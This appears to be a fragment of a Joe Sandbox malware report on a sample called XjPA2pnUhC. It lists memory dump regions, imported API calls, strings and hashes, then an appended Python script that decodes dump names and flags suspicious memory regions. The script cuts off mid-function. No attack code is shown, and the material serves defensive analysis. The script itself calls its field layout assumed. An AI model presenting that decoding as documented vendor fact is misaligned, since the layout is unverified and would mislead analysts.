                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f668ae4ce8ddce9dd25c23f8729a4a0b6b4a9a792d26258ec3aea80ac56d2768
                                                          • Instruction ID: bcf01d64231ec926d619e97b3909e4acd9ac8cc384eb6032f351c0835a184eb7
                                                          • Opcode Fuzzy Hash: f668ae4ce8ddce9dd25c23f8729a4a0b6b4a9a792d26258ec3aea80ac56d2768
                                                          • Instruction Fuzzy Hash: E86128729083059FC704DB38D581A5FF7E9AFD8768F440A2EF499D6550EB31EA088A92
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                          • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                          • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                          • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                          • Instruction ID: cc9a25ef1146f1021c61d22409eafb7023cc441d2f54f7157b5dd66b2136a0fb
                                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                          • Instruction Fuzzy Hash: CB11347720138243EA168A3ED8B46B6A79DEFC532CB3D426AD0424BF49D323A1519680
APIs
• GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 028FD29D
  • Part of subcall function 028FD268: GetProcAddress.KERNEL32(00000000), ref: 028FD281
Strings
Memory Dump Source
• Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
• Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
• API String ID: 1646373207-1918263038
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02906EDE
                                                          • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02906EEF
                                                          • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02906EFF
                                                          • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02906F0F
                                                          • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02906F1F
                                                          • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02906F2F
                                                          • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02906F3F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$HandleModule
                                                          • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                          • API String ID: 667068680-2233174745
                                                          • Opcode ID: 38ff2a457021cd9b03dcf28e245e83e835a6f2e60eecb2a20b0210c6b276a061
                                                          • Instruction ID: c00e144a72ce29b525ec0320b89c9c4721c1d84ee4f5fa22bcd98ba7cc7e51fa
                                                          • Opcode Fuzzy Hash: 38ff2a457021cd9b03dcf28e245e83e835a6f2e60eecb2a20b0210c6b276a061
                                                          • Instruction Fuzzy Hash: FBF04CEDA8D354ADBB80BB7A5CC18362BADA9A06047001D35BF52955C3FBB99434CF12
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$___from_strstr_to_strchr_wcschr
                                                          • String ID:
                                                          • API String ID: 1963305004-0
                                                          • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                          • Instruction ID: 347ed47a2a044c49c399793b9f852f3bfe83c78574f483c309ab5ae874c41d4f
                                                          • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                          • Instruction Fuzzy Hash: 2ED128B1D043106BDB35AF74DE847AE7BADEFC1324F24816EE945A7280E7369540CB52
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: d11cf9d75a9b095113a5c4e7a536203a51778a2c4217635f9f2315e0a594c0ce
                                                          • Instruction ID: f94e448063ebc228b9449b5ba3230501cc6d03cdd615012d42eb282d16f4775e
                                                          • Opcode Fuzzy Hash: d11cf9d75a9b095113a5c4e7a536203a51778a2c4217635f9f2315e0a594c0ce
                                                          • Instruction Fuzzy Hash: 93B19D71900205AFDB22DF78C980BEEBBF9BF49308F14806AE499A7241D7769945CF60
                                                          APIs
                                                          • _free.LIBCMT ref: 029C890F
                                                          • ___free_lconv_mon.LIBCMT ref: 029C891A
                                                            • Part of subcall function 029C7B12: _free.LIBCMT ref: 029C7B2F
                                                            • Part of subcall function 029C7B12: _free.LIBCMT ref: 029C7B41
                                                            • Part of subcall function 029C7B12: _free.LIBCMT ref: 029C7B53
                                                            • Part of subcall function 029C7B12: _free.LIBCMT ref: 029C7B65
                                                            • Part of subcall function 029C7B12: _free.LIBCMT ref: 029C7B77
                                                            • Part of subcall function 029C7B12: _free.LIBCMT ref: 029C7B89
                                                            • Part of subcall function 029C7B12: _free.LIBCMT ref: 029C7B9B
                                                            • Part of subcall function 029C7B12: _free.LIBCMT ref: 029C7BAD
                                                            • Part of subcall function 029C7B12: _free.LIBCMT ref: 029C7BBF
                                                            • Part of subcall function 029C7B12: _free.LIBCMT ref: 029C7BD1
                                                            • Part of subcall function 029C7B12: _free.LIBCMT ref: 029C7BE3
                                                            • Part of subcall function 029C7B12: _free.LIBCMT ref: 029C7BF5
                                                            • Part of subcall function 029C7B12: _free.LIBCMT ref: 029C7C07
                                                          • _free.LIBCMT ref: 029C8931
                                                          • _free.LIBCMT ref: 029C8946
                                                          • _free.LIBCMT ref: 029C8951
                                                          • _free.LIBCMT ref: 029C8973
                                                          • _free.LIBCMT ref: 029C8986
                                                          • _free.LIBCMT ref: 029C8994
                                                          • _free.LIBCMT ref: 029C899F
                                                          • _free.LIBCMT ref: 029C89D7
                                                          • _free.LIBCMT ref: 029C89DE
                                                          • _free.LIBCMT ref: 029C89FB
                                                          • _free.LIBCMT ref: 029C8A13
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$___free_lconv_mon
                                                          • String ID:
                                                          • API String ID: 3658870901-0
                                                          • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                          • Instruction ID: 7b9809cd86793fe96cc66477aa440e2fb62ed76f51e1f2e231ccc229c5f1c65e
                                                          • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                          • Instruction Fuzzy Hash: 7A317231600301AFDB26AA78D948B9A77EEFF81354FA0C91DE499D7550DF36E940CB22
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                          • Instruction ID: 8f21428daf90e28e489402024c65624fd98838aaf634afb2073c0cae6795d21d
                                                          • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                          • Instruction Fuzzy Hash: 68C17472D40208ABDB20DBA8CC85FEEB7FDAF49750F144169FA48EB281D67499418F61
                                                          APIs
                                                          • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 028F28CE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Message
                                                          • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                          • API String ID: 2030045667-32948583
                                                          • Opcode ID: 9e7dd63f4efeda4ff43dfe73bc98b09dc7869f6448f409425838bcdcd39a9e1c
                                                          • Instruction ID: 8c0cc99da83e3139c0387337e875ec4eb163bd0a987e5f9421355ed918aa1d54
                                                          • Opcode Fuzzy Hash: 9e7dd63f4efeda4ff43dfe73bc98b09dc7869f6448f409425838bcdcd39a9e1c
                                                          • Instruction Fuzzy Hash: 67A1F53CA042588BDBA1AA2CCC80BD8B7E5EB09354F1441E5DE4DDB28ACB7599C9CF51
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 02988439
                                                          • int.LIBCPMT ref: 0298844C
                                                            • Part of subcall function 0298568C: std::_Lockit::_Lockit.LIBCPMT ref: 0298569D
                                                            • Part of subcall function 0298568C: std::_Lockit::~_Lockit.LIBCPMT ref: 029856B7
                                                          • std::_Facet_Register.LIBCPMT ref: 0298848C
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 02988495
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 029884B3
                                                          • __Init_thread_footer.LIBCMT ref: 029884F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                          • String ID: ,kG$0kG$@!G
                                                          • API String ID: 3815856325-312998898
                                                          • Opcode ID: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
                                                          • Instruction ID: 0e2a81417afaa9c971b82a4a469669d2394e1ebc1eb05c6d7a3cfa91d1c6a351
                                                          • Opcode Fuzzy Hash: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
                                                          • Instruction Fuzzy Hash: 702149325006249BC714FB78C85099D77AAEFC1720B66402AE418EB290DF31AE44CFE4
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                          • Instruction ID: b2c24310a413608f691a2fb49eaa69bad1961f18d7c26af8093a13528265c8f6
                                                          • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                          • Instruction Fuzzy Hash: 64118976500108BFCB06EF54CA45DDD3F66FF85350F9184A5B9884F921E736DA509F90
                                                          Strings
                                                          • The sizes of unexpected leaked medium and large blocks are: , xrefs: 028F2849
                                                          • Unexpected Memory Leak, xrefs: 028F28C0
                                                          • , xrefs: 028F2814
                                                          • bytes: , xrefs: 028F275D
                                                          • An unexpected memory leak has occurred. , xrefs: 028F2690
                                                          • 7, xrefs: 028F26A1
                                                          • The unexpected small block leaks are:, xrefs: 028F2707
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                          • API String ID: 0-2723507874
                                                          • Opcode ID: d1da22d2f183b29557c513bde7b7d8eb70276c025aede8b6dfb660ee671c3528
                                                          • Instruction ID: ce91b071a7184ea6c584c6ddfaaf1e503dd1e273f37838bfc1d70e32621d92f1
                                                          • Opcode Fuzzy Hash: d1da22d2f183b29557c513bde7b7d8eb70276c025aede8b6dfb660ee671c3528
                                                          • Instruction Fuzzy Hash: 8771D23CA042988FDFA19A2CCC84BD8BBE5EB09314F1040E5DA4DDB28ADB7559C5CF52
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$_abort_memcmp
                                                          • String ID: C
                                                          • API String ID: 137591632-1037565863
                                                          • Opcode ID: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                                          • Instruction ID: 1c795b31cbe6c06c565709ead4275c6176cfc185446c53bccdcc5053e5c814ff
                                                          • Opcode Fuzzy Hash: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                                          • Instruction Fuzzy Hash: 89B14875A012299FDB25DF18C988BEDB7B5FF49304F5085AAD84AA7350E730AE90CF50
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID: 6$8+G$8+G$\lC
                                                          • API String ID: 176396367-559646030
                                                          • Opcode ID: 56fbe24947130a928e24310efb581028cf1661c032902341b78b8900ef296844
                                                          • Instruction ID: 9d0db782326e16533bc3d7c135da0c6ffde96855f79e431d7e0633f2f32622b8
                                                          • Opcode Fuzzy Hash: 56fbe24947130a928e24310efb581028cf1661c032902341b78b8900ef296844
                                                          • Instruction Fuzzy Hash: F751CF712083217BE708B738DC51A6E639EDFD0724F04982EF40E8A1D2EF599D058A6A
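The Memory Dump Source names above pack the process index, the dump base address and the region's page protection, commit state and memory type into fixed-width hex fields. The Python below is an added example, not part of the Joe Sandbox report or its tooling, that decodes those names and triages each region. The field order is an assumption inferred from the winnt.h constant values that appear in the names (0x40 = PAGE_EXECUTE_READWRITE, 0x1000 = MEM_COMMIT, 0x20000 = MEM_PRIVATE), not from vendor documentation. The sample lines are constructed from the dump names on this page; the Offset and "based on PE" annotation of the Associated regions is assumed to match the Source File lines that carry it.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# winnt.h constants used to decode the hex fields.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
MEM_IMAGE = 0x1000000

# ASSUMED field layout (inferred from the constant values, not vendor docs):
#   <proc>.<phase>.<dumpid>.<base>.<protect>.<state>.<type>.<extra>.sdmp
SDMP_RE = re.compile(
    r"(?P<proc>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.(?P<dumpid>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<extra>[0-9A-Fa-f]{8})\.sdmp"
)
SOURCE_RE = re.compile(
    r"Source File:\s*(?P<name>\S+\.sdmp)"
    r"(?:,\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+))?"
    r"(?:,\s*based on PE:\s*(?P<pe>true|false))?"
)


@dataclass
class Region:
    process: int
    base: int
    protect: int
    state: int
    mem_type: int
    image_base: Optional[int]  # "Offset:" = base of the PE this region belongs to
    is_pe: bool                # "based on PE: true"

    @property
    def protect_name(self) -> str:
        # Mask off modifiers such as PAGE_GUARD (0x100) and PAGE_NOCACHE (0x200).
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:X}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:X}")


def parse_source_line(line: str) -> Region:
    """Parse one 'Source File: <name>.sdmp, Offset: <hex>, based on PE: <bool>' line."""
    m = SOURCE_RE.search(line)
    if not m:
        raise ValueError(f"not a Source File line: {line!r}")
    f = SDMP_RE.fullmatch(m["name"])
    if not f:
        raise ValueError(f"unrecognised dump name: {m['name']!r}")
    return Region(
        process=int(f["proc"], 16), base=int(f["base"], 16),
        protect=int(f["protect"], 16), state=int(f["state"], 16),
        mem_type=int(f["type"], 16),
        image_base=int(m["offset"], 16) if m["offset"] else None,
        is_pe=(m["pe"] == "true"),
    )


def classify(r: Region) -> str:
    """Triage label: what a responder should pull and scan first."""
    executable = bool(r.protect & 0xF0)  # the PAGE_EXECUTE* bits
    writable = bool(r.protect & 0xCC)    # READWRITE, WRITECOPY and their EXECUTE_ variants
    if r.mem_type == MEM_IMAGE:
        return "image"        # mapped by the loader from a file on disk
    if executable and writable:
        return "rwx-private"  # writable+executable private memory: unpack/injection target
    if r.is_pe:
        return "private-pe"   # PE layout without MEM_IMAGE: manually mapped, no backing file
    if executable:
        return "rx-private"
    return "data"


def summarize(lines: List[str]) -> Dict[int, Dict[str, int]]:
    """Count triage labels per PE image (keyed by the report's Offset)."""
    groups: Dict[int, Dict[str, int]] = {}
    for line in lines:
        if "Source File:" not in line:
            continue
        r = parse_source_line(line)
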